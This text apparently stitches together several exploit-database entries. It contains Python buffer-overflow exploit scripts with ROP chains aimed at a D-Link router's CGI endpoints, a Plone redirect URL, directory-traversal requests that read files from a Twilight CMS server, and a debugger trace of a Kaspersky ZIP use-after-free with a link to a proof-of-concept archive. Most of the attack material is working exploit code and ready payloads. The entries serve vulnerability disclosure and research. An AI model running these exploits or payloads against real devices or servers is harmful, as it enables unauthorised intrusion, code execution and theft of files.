buf+="\x2A\xBF\xB9\xF4" #s1 useless
buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address
buf+="DDDD" #s3
buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC
buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2
buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
# Bad chars \x00 - \x20
# sleep address 2ac14c30
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
buf+="1111" #s0 Loaded argument in S0 which is loaded in a0
buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30
buf+="XXXX"
buf+="FFFF" # s3
buf+="XXXX"
buf+="BBBB" # s5
buf+="CCCC" # s6
buf+="DDDD" # s7
buf+="DDDD" # extra pad
buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="XXXX" #
buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode
buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
source: https://www.securityfocus.com/bid/61964/info
Plone is prone to a session-hijacking vulnerability.
An attacker can exploit this issue to hijack user sessions and gain unauthorized access to the affected application.
Note: This issue was previously discussed in the BID 61544 (Plone Multiple Remote Security Vulnerabilities), but has been moved to its own record to better document it.
https://www.example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch
source: https://www.securityfocus.com/bid/61906/info
Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
Twilight CMS 0.4.2 is vulnerable; other versions may also be affected.
nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1
Source: https://code.google.com/p/google-security-research/issues/detail?id=521
Fuzzing the ZIP file format found multiple memory corruption issues, some of which are obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM on any system with Kaspersky Antivirus.
This testcase should fault by jumping to an unmapped address
(aac.fa4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=cccccccc ebx=00000000 ecx=01bc2974 edx=73a10002 esi=02e0a598 edi=5b2266bb
eip=cccccccc esp=05dde330 ebp=05dde354 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
cccccccc ?? ???
# where did that come from?
0:036> kvn 2
# ChildEBP RetAddr Args to Child
00 05dde32c 739fd847 02e0a598 05dde370 00000000 0xcccccccc
01 05dde354 739fe438 01bc2974 002266bb 05dde370 prcore!PragueUnload+0x2687
0:036> ub 739fd847 L9
prcore!PragueUnload+0x2673:
739fd833 8b4d08 mov ecx,dword ptr [ebp+8]
739fd836 8b7104 mov esi,dword ptr [ecx+4]
739fd839 8975ec mov dword ptr [ebp-14h],esi
739fd83c 85f6 test esi,esi
739fd83e 740a je prcore!PragueUnload+0x268a (739fd84a)
739fd840 8b16 mov edx,dword ptr [esi]
739fd842 8b02 mov eax,dword ptr [edx]
739fd844 56 push esi
739fd845 ffd0 call eax
# that pointer is in edx
0:088> dd edx
739a0002 cccccccc cccccccc cccccccc 8b55cccc
739a0012 77e95dec ccffffff cccccccc 8b55cccc
739a0022 0c4d8bec 8b04418b 42390855 501a7504
739a0032 0a8b018b d3e85150 83fffff9 c0850cc4
739a0042 01b80775 5d000000 5dc033c3 8b55ccc3
739a0052 0c4d8bec 8b04418b 42390855 501a7504
739a0062 0a8b018b 63e85150 83fffff9 c0850cc4
739a0072 01b80775 5d000000 5dc033c3 6c83ccc3
# So what is that?
0:088> !address edx
Usage: Image
Base Address: 73971000
End Address: 739aa000
Region Size: 00039000
State: 00001000 MEM_COMMIT
Protect: 00000020 PAGE_EXECUTE_READ
Type: 01000000 MEM_IMAGE
Allocation Base: 73970000
Allocation Protect: 00000080 PAGE_EXECUTE_WRITECOPY
Image Path: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\prcore.dll
Module Name: prcore
Loaded Image Name: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\prcore.dll
Mapped Image Name:
0:088> !chkimg prcore
0 errors : prcore
# Hmm, so why is esi pointing there?
0:088> !address esi
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: Heap
Base Address: 02a00000
End Address: 02c33000
Region Size: 00233000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 02a00000
Allocation Protect: 00000004 PAGE_READWRITE
More info: heap owning the address: !heap 0x4a0000
More info: heap segment
More info: heap entry containing the address: !heap -x 0x2bf4760
0:088> !heap -x 0x2bf4760
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
02bf4758 02bf4760 004a0000 02b00ac8 60 - 0 LFH;free
# So looks like an exploitable use after free vulnerability.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38736.zip